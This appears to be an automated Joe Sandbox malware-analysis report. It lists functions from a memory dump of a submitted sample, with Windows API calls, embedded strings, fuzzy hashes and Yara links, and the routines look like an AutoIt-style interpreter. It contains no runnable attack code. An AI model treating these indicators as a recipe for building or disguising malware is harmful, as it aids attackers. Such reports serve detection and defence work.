Opcode Fuzzy Hash: c3328575586857c1007ed862a53f6cd3b17a0fde88e4ddfa8a1bfdbbea8bfdb9
Instruction Fuzzy Hash: 52616C71108341AFC712EF64DC85DAFBBE8EF89710F404A2EF5919A1E1DB709A49CB52

Function 003BABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 003BAC33

Strings

ACTIVE, xrefs: 003BAC0E
HANDLE=, xrefs: 003BAC2C
[HANDLE:, xrefs: 003BAC3F
[ALL, xrefs: 003BACD9
LAST, xrefs: 003BABF8
[LAST, xrefs: 003BACE0
ALL, xrefs: 003BACC7
[REGEXPTITLE:, xrefs: 003BAC5B
[CLASS:, xrefs: 003BAC83
[ACTIVE, xrefs: 003BAC20
REGEXP=, xrefs: 003BAC48
CLASSNAME=, xrefs: 003BAC70

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: c2e0a29d1076cba2c644fecc610c7e5d5f57241946fab1dc0c5955205ad51fcf
Instruction ID: f46f47d4be9a719d5b68257263f4a9d7883749c7063fff4da03bae8a0f8a7dfc
Opcode Fuzzy Hash: c2e0a29d1076cba2c644fecc610c7e5d5f57241946fab1dc0c5955205ad51fcf
Instruction Fuzzy Hash: EA310431A88A09A7CA12FA50DD03FEE7BB49F10794F70402AF541BA4D5EF656F048656

Function 003D4FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 003D5013
LoadCursorW.USER32(00000000,00007F00), ref: 003D501E
LoadCursorW.USER32(00000000,00007F03), ref: 003D5029
LoadCursorW.USER32(00000000,00007F8B), ref: 003D5034
LoadCursorW.USER32(00000000,00007F01), ref: 003D503F
LoadCursorW.USER32(00000000,00007F81), ref: 003D504A
LoadCursorW.USER32(00000000,00007F88), ref: 003D5055
LoadCursorW.USER32(00000000,00007F80), ref: 003D5060
LoadCursorW.USER32(00000000,00007F86), ref: 003D506B
LoadCursorW.USER32(00000000,00007F83), ref: 003D5076
LoadCursorW.USER32(00000000,00007F85), ref: 003D5081
LoadCursorW.USER32(00000000,00007F82), ref: 003D508C
LoadCursorW.USER32(00000000,00007F84), ref: 003D5097
LoadCursorW.USER32(00000000,00007F04), ref: 003D50A2
LoadCursorW.USER32(00000000,00007F02), ref: 003D50AD
LoadCursorW.USER32(00000000,00007F89), ref: 003D50B8
GetCursorInfo.USER32(?), ref: 003D50C8

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: acef04a1691ed7d402b6eeaf0244213b63204e27412249d77c8221c22543d2a0
Instruction ID: b294713da227265ecbecd523568f8528cac6d83a90b62e7c538f65537a7cbc70
Opcode Fuzzy Hash: acef04a1691ed7d402b6eeaf0244213b63204e27412249d77c8221c22543d2a0
Instruction Fuzzy Hash: A33113B1D48319AADF119FB69C8996FBFECFF04750F50452BA50CE7280DA78A5048F91

Function 003EA1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003EA259
DestroyWindow.USER32(?,?), ref: 003EA2D3

Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 003EA34D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 003EA36F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003EA382
DestroyWindow.USER32(00000000), ref: 003EA3A4
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00360000,00000000), ref: 003EA3DB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003EA3F4
GetDesktopWindow.USER32 ref: 003EA40D
GetWindowRect.USER32(00000000), ref: 003EA414
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 003EA42C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 003EA444

Part of subcall function 003625DB: GetWindowLongW.USER32(?,000000EB), ref: 003625EC

Strings

tooltips_class32, xrefs: 003EA346, 003EA3D4
0, xrefs: 003EA26F

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 99587a2644709910e87b0aa6785b34e2667f1d0535ae0886753cededeb61bdd2
Instruction ID: 0c9f47ef533fd2e3b1a9f1444ca26df84b0923b839090c3036680a9488225e17
Opcode Fuzzy Hash: 99587a2644709910e87b0aa6785b34e2667f1d0535ae0886753cededeb61bdd2
Instruction Fuzzy Hash: FA719D70140684AFD722DF29CC49F667BE9FB88304F45462DF9859B2E0C7B4E902CB56

Function 003E4392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 003E4424
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003E446F

Strings

GETTOTALCOUNT, xrefs: 003E4456
EXISTS, xrefs: 003E44D8
GETITEMCOUNT, xrefs: 003E4551
COLLAPSE, xrefs: 003E44B5
EXPAND, xrefs: 003E4521
GETTEXT, xrefs: 003E45C2
SELECT, xrefs: 003E4620
GETSELECTED, xrefs: 003E457F
ISCHECKED, xrefs: 003E45F2
UNCHECK, xrefs: 003E464B
CHECK, xrefs: 003E448F

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: a07ea1873a3723ca54f3faf89b0979f9edbd379910f828ba1b4df459c1109461
Instruction ID: a3c21903c3770ffb72aae5cac2318d288445a338e13b09047dbda6be7b6b34b7
Opcode Fuzzy Hash: a07ea1873a3723ca54f3faf89b0979f9edbd379910f828ba1b4df459c1109461
Instruction Fuzzy Hash: B091AB746003108FCB0AEF11C452AAEB7E5AF99354F058969F8965F7E2CB34ED49CB81

Function 003EB7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 003EB8B4
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,003E91C2), ref: 003EB910
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003EB949
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 003EB98C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003EB9C3
FreeLibrary.KERNEL32(?), ref: 003EB9CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003EB9DF
DestroyIcon.USER32(?,?,?,?,?,003E91C2), ref: 003EB9EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 003EBA0B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 003EBA17

Part of subcall function 00382EFD: __wcsicmp_l.LIBCMT ref: 00382F86

Strings

.icl, xrefs: 003EB82A
.exe, xrefs: 003EB84A
.dll, xrefs: 003EB86D

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 5081ac8923bce381a38547af2c6779c3340795653ff40cd3525605cf1eaeadc4
Instruction ID: ba2e5571981742d7de27db7519ab3c54047ea8a525ba8d311e345a486cf4a3d8
Opcode Fuzzy Hash: 5081ac8923bce381a38547af2c6779c3340795653ff40cd3525605cf1eaeadc4
Instruction Fuzzy Hash: 7461C071500269BFEB16DF65CC81FBBB7ACEB08710F108216F915DA1D1DBB4A980DBA0

Function 003CDC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 003CDCDC
SystemTimeToFileTime.KERNEL32(?,?), ref: 003CDCEC
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003CDCF8
__wsplitpath.LIBCMT ref: 003CDD56
_wcscat.LIBCMT ref: 003CDD6E
_wcscat.LIBCMT ref: 003CDD80
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003CDD95
SetCurrentDirectoryW.KERNEL32(?), ref: 003CDDA9
SetCurrentDirectoryW.KERNEL32(?), ref: 003CDDDB
SetCurrentDirectoryW.KERNEL32(?), ref: 003CDDFC
_wcscpy.LIBCMT ref: 003CDE08
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 003CDE47

Strings

*.*, xrefs: 003CDE02

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 181bbf33ec8eb13bb0ef57bc5190141ec50472283e2233800cdefe7362d252ce
Instruction ID: 63eb0c0c7a0c361ae459d3cdb654d8b8839f391e8278b833a96d59a02ade4d08
Opcode Fuzzy Hash: 181bbf33ec8eb13bb0ef57bc5190141ec50472283e2233800cdefe7362d252ce
Instruction Fuzzy Hash: D06159765042459FCB11EF60C844EAEB3E8BF89314F04892EF999CB251DB71ED45CB92

Function 003C9C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 003C9C7F

Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 003C9CA0
__swprintf.LIBCMT ref: 003C9CF9
__swprintf.LIBCMT ref: 003C9D12
_wprintf.LIBCMT ref: 003C9DB9
_wprintf.LIBCMT ref: 003C9DD7

Strings

^ ERROR , xrefs: 003C9D4E
"%s" (%d) : ==> %s:%s%s, xrefs: 003C9DB4
Error: , xrefs: 003C9D81
Incorrect parameters to object property !, xrefs: 003C9D5B
Line %d (File "%s"):, xrefs: 003C9CF3, 003C9D0C
"%s" (%d) : ==> %s:, xrefs: 003C9DD2

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: 32ef6fa84724fe6c131be6202bbdbb8d9a09eda574c937ec69af9e13becda8be
Instruction ID: 6b216ffa711c790f23f49b5a254fc7afdf0b033c1b4401397eb3c7399335a6bb
Opcode Fuzzy Hash: 32ef6fa84724fe6c131be6202bbdbb8d9a09eda574c937ec69af9e13becda8be
Instruction Fuzzy Hash: D4517232900509AACF16FBE0CD46EEEB778AF14304F60406AF505B61A1DB352F59DF65

Function 003CA352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC

CharLowerBuffW.USER32(?,?), ref: 003CA3CB
GetDriveTypeW.KERNEL32 ref: 003CA418
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003CA460
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003CA497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003CA4C5

Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06

Strings

open, xrefs: 003CA3F2
open , xrefs: 003CA427
wait, xrefs: 003CA482
close, xrefs: 003CA3D1
set cd door , xrefs: 003CA466
closed, xrefs: 003CA3DF, 003CA3E8
close cd wait, xrefs: 003CA4B0
type cdaudio alias cd wait, xrefs: 003CA443

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 92405b2ecfdb4ca765f022be9bb20a8bd737eb0668229cb02bbd2338bd909cfb
Instruction ID: 845767d8fdf54337c6f80f7134c570832cf736c1ed9a3076188f922fd455bcdb
Opcode Fuzzy Hash: 92405b2ecfdb4ca765f022be9bb20a8bd737eb0668229cb02bbd2338bd909cfb
Instruction Fuzzy Hash: EB517E711047049FC705EF21C881D6AB3E8FF98758F50896DF89A9B2A1DB71ED09CB52

Function 003BF8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0039E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 003BF8DF
LoadStringW.USER32(00000000,?,0039E029,00000001), ref: 003BF8E8

Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0039E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 003BF90A
LoadStringW.USER32(00000000,?,0039E029,00000001), ref: 003BF90D
__swprintf.LIBCMT ref: 003BF95D
__swprintf.LIBCMT ref: 003BF96E
_wprintf.LIBCMT ref: 003BFA17
MessageBoxW.USER32(00000000,?,?,00011010), ref: 003BFA2E

Strings

%s (%d) : ==> %s: %s %s, xrefs: 003BFA12
Error: , xrefs: 003BF9E5
Line %d (File "%s"):, xrefs: 003BF957
Line %d:, xrefs: 003BF968
^ ERROR, xrefs: 003BF9C3

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: a7e8b8beea2cd33cb9d7b9a3d9ed50d2d0e904fe38e9ddfaa6a98764625ef808
Instruction ID: 4f1320faf510fe58d7d0e4d0fb015e85ce04d4582fb347b5b0f466d43973ea45
Opcode Fuzzy Hash: a7e8b8beea2cd33cb9d7b9a3d9ed50d2d0e904fe38e9ddfaa6a98764625ef808
Instruction Fuzzy Hash: 94414F7280020DAACF16FBE0DD86EEEB778AF14304F504065F605BA096EB756F49CB61

Function 003EBA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,003E9207,?,?), ref: 003EBA56
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,003E9207,?,?,00000000,?), ref: 003EBA6D
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,003E9207,?,?,00000000,?), ref: 003EBA78
CloseHandle.KERNEL32(00000000,?,?,?,?,003E9207,?,?,00000000,?), ref: 003EBA85
GlobalLock.KERNEL32(00000000), ref: 003EBA8E
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,003E9207,?,?,00000000,?), ref: 003EBA9D
GlobalUnlock.KERNEL32(00000000), ref: 003EBAA6
CloseHandle.KERNEL32(00000000,?,?,?,?,003E9207,?,?,00000000,?), ref: 003EBAAD
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,003E9207,?,?,00000000,?), ref: 003EBABE
OleLoadPicture.OLEAUT32(?,00000000,00000000,003F2CAC,?), ref: 003EBAD7
GlobalFree.KERNEL32(00000000), ref: 003EBAE7
GetObjectW.GDI32(00000000,00000018,?), ref: 003EBB0B
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 003EBB36
DeleteObject.GDI32(00000000), ref: 003EBB5E
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 003EBB74

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 1264087974062c1a00af0fc93c5968f51abd941c5a72351876d860e96a9fa45c
Instruction ID: 0235d1cf4e1bcb3e1ae1539c16f163627d166b6937a1311645b755cb46bdf555
Opcode Fuzzy Hash: 1264087974062c1a00af0fc93c5968f51abd941c5a72351876d860e96a9fa45c
Instruction Fuzzy Hash: 09413B75500259EFDB239F66DC88EABBBBCEB89711F114268F905DB2A0D7709901CB60

Function 003CD899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 003CDA10
_wcscat.LIBCMT ref: 003CDA28
_wcscat.LIBCMT ref: 003CDA3A
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003CDA4F
SetCurrentDirectoryW.KERNEL32(?), ref: 003CDA63
GetFileAttributesW.KERNEL32(?), ref: 003CDA7B
SetFileAttributesW.KERNEL32(?,00000000), ref: 003CDA95
SetCurrentDirectoryW.KERNEL32(?), ref: 003CDAA7

Strings

*.*, xrefs: 003CDAE6

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: a7dc5b1ce00cddbd85c53ba745e1af958dec1878d10f02184ac40d6122d6e432
Instruction ID: 38349f71ff5e21c6f6c9e022378b1956485782a0fb3d6b11b44d5d3bb4f56507
Opcode Fuzzy Hash: a7dc5b1ce00cddbd85c53ba745e1af958dec1878d10f02184ac40d6122d6e432
Instruction Fuzzy Hash: B8814C765043419FCB66EF64C884E6AB7E8AB89310F15893EF889CB251E730ED45CB52

Function 003EC1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00362612: GetWindowLongW.USER32(?,000000EB), ref: 00362623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 003EC1FC
GetFocus.USER32 ref: 003EC20C
GetDlgCtrlID.USER32(00000000), ref: 003EC217
_memset.LIBCMT ref: 003EC342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 003EC36D
GetMenuItemCount.USER32(?), ref: 003EC38D
GetMenuItemID.USER32(?,00000000), ref: 003EC3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 003EC3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 003EC41C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003EC454
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 003EC489

Strings

0, xrefs: 003EC33A

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 8b567ad7b4cecffacd2e43aa2f55cabec8d091083de7ce9467feab0b3a1c465f
Instruction ID: b75bdd8c52bd0fda7597bb587c35d3579004ab67729188f9ea61d97ade5ee47c
Opcode Fuzzy Hash: 8b567ad7b4cecffacd2e43aa2f55cabec8d091083de7ce9467feab0b3a1c465f
Instruction Fuzzy Hash: FD818E712183A19FDB22DF16C884A6FBBE8FB88314F014A2DF995972D1C770D906CB52

Function 003D731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 003D738F
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 003D739B
CreateCompatibleDC.GDI32(?), ref: 003D73A7
SelectObject.GDI32(00000000,?), ref: 003D73B4
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 003D7408
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 003D7444
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 003D7468
SelectObject.GDI32(00000006,?), ref: 003D7470
DeleteObject.GDI32(?), ref: 003D7479
DeleteDC.GDI32(00000006), ref: 003D7480
ReleaseDC.USER32(00000000,?), ref: 003D748B

Strings

(, xrefs: 003D7410

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
